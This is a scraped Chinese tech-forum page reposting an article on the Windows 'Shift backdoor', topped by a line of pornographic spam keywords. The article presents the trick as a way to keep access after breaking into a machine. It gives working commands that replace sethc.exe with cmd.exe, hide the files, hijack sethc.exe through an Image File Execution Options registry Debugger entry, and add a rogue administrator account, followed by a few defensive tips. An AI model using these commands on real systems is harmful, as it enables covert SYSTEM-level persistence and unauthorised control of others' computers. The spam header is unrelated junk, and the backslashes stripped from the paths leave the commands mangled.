chinese直男口爆体育生外卖, 99久久er热在这里只有精品99, 又色又爽又黄18禁美女裸身无遮挡, gogogo高清免费观看日本电视,私密按摩师高清版在线,人妻视频毛茸茸,91论坛 兴趣闲谈,欧美 亚洲 精品 8区,国产精品久久久久精品免费

0
  • 聊天消息
  • 系統(tǒng)消息
  • 評(píng)論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線課程
  • 觀看技術(shù)視頻
  • 寫(xiě)文章/發(fā)帖/加入社區(qū)
會(huì)員中心
創(chuàng)作中心

完善資料讓更多小伙伴認(rèn)識(shí)你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

Windows Shift后門(mén)利用

jf_hKIAo4na ? 來(lái)源:Mi1k7ea ? 2023-01-30 10:38 ? 次閱讀
加入交流群
微信小助手二維碼

掃碼添加小助手

加入工程師交流群

0x00 前言

通常,在內(nèi)網(wǎng)滲透打下一臺(tái)機(jī)子之后,可以給這臺(tái)機(jī)子留個(gè)Shift后門(mén)。

0x01 Shift后門(mén)利用

簡(jiǎn)介

粘滯鍵漏洞,在Windows系統(tǒng)下連續(xù)按5下SHIFT鍵,可以啟動(dòng)系統(tǒng)的粘滯鍵功能,其進(jìn)程名為Sethc.exe,應(yīng)用程序在Windowssystem32下。

黑客用其它應(yīng)用程序(如:cmd.exe、explorer.exe 或木馬、病毒)將Sethc.exe替換。當(dāng)再次連續(xù)按5次SHIFT鍵,就會(huì)啟動(dòng)黑客替換的應(yīng)用程序,如此便留下了5下SHIFT后門(mén),黑客3389登錄遠(yuǎn)程計(jì)算機(jī)時(shí),在用戶登錄界面,連續(xù)按5下SHIFT就可以啟動(dòng)該漏洞,進(jìn)而控制遠(yuǎn)程計(jì)算機(jī)。

漏洞原理

在Windows系統(tǒng)登錄界面狀態(tài)下,粘滯鍵仍可以以連續(xù)按5下SHIFT鍵運(yùn)行,并且此時(shí)應(yīng)用程序會(huì)以WINDOWS的最高權(quán)限-SYSTEM權(quán)限運(yùn)行,所以計(jì)算機(jī)一旦被安裝該后門(mén),入侵者便可悄無(wú)聲息地遠(yuǎn)程操縱計(jì)算機(jī)。

漏洞利用

大致思路如下:

拿到目標(biāo)主機(jī)權(quán)限后,到Windowssystem32目錄下,將sethc.exe替換成cmd.exe;

其中,命令行方式為:

copy c:windowssystem32cmd.exe c:windowssystem32sethc.exe
copy c:windowssystem32sethc.exe c:windowssystem32dllcachesethc.exe
attrib c:windowssystem32sethc.exe +h
attrib c:windowssystem32dllcachesethc.exe +h

注意:要將dllcache文件夾中的緩存刪掉,否則會(huì)自動(dòng)復(fù)原回去。

注冊(cè)表方式為:

REG ADD "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exe" /v Debugger /t REG_SZ /d "C:windowssystem32cmd.exe"

命令說(shuō)明:reg add是向注冊(cè)表添加記錄,后面跟的是注冊(cè)表的位置,注意的是HKLM是HKEY_LOCAL_MACHINE的縮寫(xiě)。Image File Execution Option這個(gè)目錄是用來(lái)設(shè)置鏡像劫持的,要被劫持的就是命令中的sethc粘滯鍵程序,隨后通過(guò)/ v來(lái)指定鍵名,其中鍵名debugger是固定的,然后通過(guò)/ t來(lái)指定REG_SZ字符串類型,最后通過(guò)/ d來(lái)指定鍵的值,即被惡意替換的程序cmd.exe。

這樣,在下次遠(yuǎn)程連接目標(biāo)主機(jī)登錄的時(shí)候就可以連續(xù)5下SHIFT觸發(fā)cmd.exe;

可以輸入explorer.exe調(diào)出程序管理系統(tǒng)方便操作;

當(dāng)然,上面的方法存在缺陷,就是可能會(huì)導(dǎo)致遠(yuǎn)程連接無(wú)法持久進(jìn)行,因此可以直接添加新用戶便于下次直接登錄:

net user mi1k7ea 123456 /add
net localgroup administrators mi1k7ea /add'

防御方法

如果系統(tǒng)盤(pán)為NTFS文件系統(tǒng),可以將sytem32下的sethc.exe文件設(shè)為everyone拒絕訪問(wèn);

直接將其刪除,最好的方法是在控制面板-輔助功能選項(xiàng)-粘滯鍵選項(xiàng),將“使用快捷鍵”取消即可。;

通過(guò)注冊(cè)表設(shè)置實(shí)現(xiàn)防御;

審核編輯 :李倩

聲明:本文內(nèi)容及配圖由入駐作者撰寫(xiě)或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點(diǎn)僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場(chǎng)。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問(wèn)題,請(qǐng)聯(lián)系本站處理。 舉報(bào)投訴
  • WINDOWS
    +關(guān)注

    關(guān)注

    4

    文章

    3614

    瀏覽量

    91429
  • 應(yīng)用程序
    +關(guān)注

    關(guān)注

    38

    文章

    3337

    瀏覽量

    59042
  • Shift
    +關(guān)注

    關(guān)注

    0

    文章

    5

    瀏覽量

    7573

原文標(biāo)題:Windows Shift后門(mén)利用

文章出處:【微信號(hào):菜鳥(niǎo)學(xué)安全,微信公眾號(hào):菜鳥(niǎo)學(xué)安全】歡迎添加關(guān)注!文章轉(zhuǎn)載請(qǐng)注明出處。

收藏 人收藏
加入交流群
微信小助手二維碼

掃碼添加小助手

加入工程師交流群

    評(píng)論

    相關(guān)推薦
    熱點(diǎn)推薦

    國(guó)產(chǎn)海光OPS電腦怎樣快速切換windows和國(guó)產(chǎn)麒麟統(tǒng)信系統(tǒng)

    WINDOWS
    深圳雙芯信息科技有限公司
    發(fā)布于 :2025年06月23日 12:40:57

    Xilinx Shift RAM IP概述和主要功能

    Xilinx Shift RAM IP 是 AMD Xilinx 提供的一個(gè) LogiCORE IP 核,用于在 FPGA 中實(shí)現(xiàn)高效的移位寄存器(Shift Register)。該 IP 核利用
    的頭像 發(fā)表于 05-14 09:36 ?348次閱讀

    DLP4500如何自動(dòng)產(chǎn)生graycode和phase shift pattern?

    我在看DLP的sdk介紹和解析中說(shuō),DLP4500可以自動(dòng)產(chǎn)生graycode和phase shift pattern,但是我沒(méi)有找到方法。 請(qǐng)問(wèn)要怎么實(shí)現(xiàn)呢?具體的步驟是什么? 期待得到回復(fù)!謝謝
    發(fā)表于 02-27 08:19

    dlpc3433是否支持通過(guò)pixel shift來(lái)實(shí)現(xiàn)atw的功能?

    dlpc3433是否支持通過(guò)pixel shift來(lái)實(shí)現(xiàn)atw的功能,已幫助改善拖影和color break問(wèn)題
    發(fā)表于 02-26 08:19

    windows搭建ftp服務(wù)器的步驟

    Windows系統(tǒng)上搭建FTP(文件傳輸協(xié)議)服務(wù)器通常涉及一系列步驟,包括安裝必要的服務(wù)、配置服務(wù)器設(shè)置、以及確保網(wǎng)絡(luò)安全設(shè)置允許FTP流量。 一、準(zhǔn)備工作 確定操作系統(tǒng)版本 : 確保你
    的頭像 發(fā)表于 02-01 15:49 ?1335次閱讀

    hyper shift,hyper-v的正確關(guān)閉步驟

    步驟? ? ?Windows10系統(tǒng),通過(guò)控制面板卸載,打開(kāi)“控制面板”,可以通過(guò)左下方的開(kāi)始菜單或任務(wù)欄搜索找到。選擇“程序和功能”。點(diǎn)擊“啟用或關(guān)閉Windows功能”。在打開(kāi)的窗口中,找到“Hyper-V”選項(xiàng),取消勾選。點(diǎn)擊“確定”,等待系統(tǒng)完成卸載。 ? ?
    的頭像 發(fā)表于 01-23 11:09 ?811次閱讀
    hyper <b class='flag-5'>shift</b>,hyper-v的正確關(guān)閉步驟

    mac和windows的區(qū)別 mac的優(yōu)缺點(diǎn)分析

    Mac和Windows的區(qū)別 Mac和Windows是兩種主流的操作系統(tǒng),它們各自有著不同的設(shè)計(jì)理念和用戶群體。以下是對(duì)Mac和Windows操作系統(tǒng)的一些基本區(qū)別和Mac的優(yōu)缺點(diǎn)分析。 1.
    的頭像 發(fā)表于 12-19 15:01 ?1.2w次閱讀

    2024 Commvault SHIFT全球巡演中國(guó)站完美收官

    近日,2024 Commvault SHIFT全球巡演 · 中國(guó)站完美收官。大會(huì)匯聚數(shù)據(jù)安全和管理領(lǐng)域的知名專家、業(yè)務(wù)掌舵人和生態(tài)伙伴,聚焦混合云趨勢(shì)下的數(shù)據(jù)保護(hù)需求變革,探討企業(yè)如何借助創(chuàng)新平臺(tái)驅(qū)動(dòng)全新范式,成就持續(xù)業(yè)務(wù)的競(jìng)爭(zhēng)優(yōu)勢(shì),呈現(xiàn)了一場(chǎng)思想和技術(shù)的盛宴。
    的頭像 發(fā)表于 12-10 16:44 ?884次閱讀

    Windows 10將于2025年終止免費(fèi)更新,微軟力推Windows 11

    近日,微軟在其官方網(wǎng)站上發(fā)布了一則通知,宣布自2025年10月14日起,將正式停止為Windows 10操作系統(tǒng)提供來(lái)自Windows更新的免費(fèi)軟件更新、技術(shù)支持以及安全修復(fù)程序。這一決定意味著
    的頭像 發(fā)表于 11-05 10:35 ?1703次閱讀

    Commvault SHIFT全球線上大會(huì)圓滿落幕

    近日,Commvault SHIFT全球線上大會(huì)圓滿落幕。大會(huì)上,Commvault發(fā)布了一系列面向持續(xù)業(yè)務(wù)的平臺(tái)新功能,并攜手行業(yè)專家暢談云優(yōu)先時(shí)代的彈性趨勢(shì)。Commvault總裁兼首席執(zhí)行官
    的頭像 發(fā)表于 10-21 11:32 ?722次閱讀

    華納云:ChatGPT 登陸 Windows

    ChatGPT 現(xiàn)已在 Windows 上推出。 今天,OpenAI宣布已開(kāi)始預(yù)覽其 AI 聊天機(jī)器人平臺(tái)ChatGPT的專用 Windows 應(yīng)用程序。 OpenAI 表示, ChatGPT
    的頭像 發(fā)表于 10-18 15:50 ?529次閱讀

    Windows管理內(nèi)存的三種主要方式

    Windows操作系統(tǒng)提供了多種方式來(lái)管理內(nèi)存,以確保系統(tǒng)資源的有效利用和性能的優(yōu)化。以下是關(guān)于Windows管理內(nèi)存的三種主要方式的詳細(xì)闡述,包括堆內(nèi)存管理、虛擬內(nèi)存管理以及共享內(nèi)存管理,每種方式都將從概念、原理、運(yùn)作機(jī)制和應(yīng)
    的頭像 發(fā)表于 10-12 17:09 ?2390次閱讀

    Credo發(fā)布HiWire SHIFT AEC新品:專為滿足中國(guó)市場(chǎng)AI/ML網(wǎng)絡(luò)連接需求而設(shè)計(jì)優(yōu)化

    數(shù)據(jù)中心市場(chǎng)量身打造的適用于400G Q112網(wǎng)絡(luò)接口的HiWire SHIFT AEC(有源電纜Active Electrical Cables)新系列產(chǎn)品,可以滿足AI/ML后端網(wǎng)絡(luò)與TOR交換機(jī)之間
    發(fā)表于 09-12 14:55 ?1318次閱讀
    Credo發(fā)布HiWire <b class='flag-5'>SHIFT</b> AEC新品:專為滿足中國(guó)市場(chǎng)AI/ML網(wǎng)絡(luò)連接需求而設(shè)計(jì)優(yōu)化

    Credo發(fā)布HiWire SHIFT AEC新品

    該新系列SHIFT AEC產(chǎn)品是基于Credo先進(jìn)的800G HiWire AEC設(shè)計(jì)優(yōu)化而來(lái),能效卓越,性能更佳,且具有極致的可靠性
    的頭像 發(fā)表于 09-12 14:07 ?644次閱讀

    windows11 遠(yuǎn)程連接工具

    隨著遠(yuǎn)程辦公的普及,選擇合適的遠(yuǎn)程桌面工具變得尤為重要。在Windows11上,用戶可以利用系統(tǒng)自帶的遠(yuǎn)程桌面功能,或選擇更專業(yè)的第三方解決方案,如Splashtop。本文將詳細(xì)介紹如何在
    的頭像 發(fā)表于 08-06 08:37 ?821次閱讀
    <b class='flag-5'>windows</b>11 遠(yuǎn)程連接工具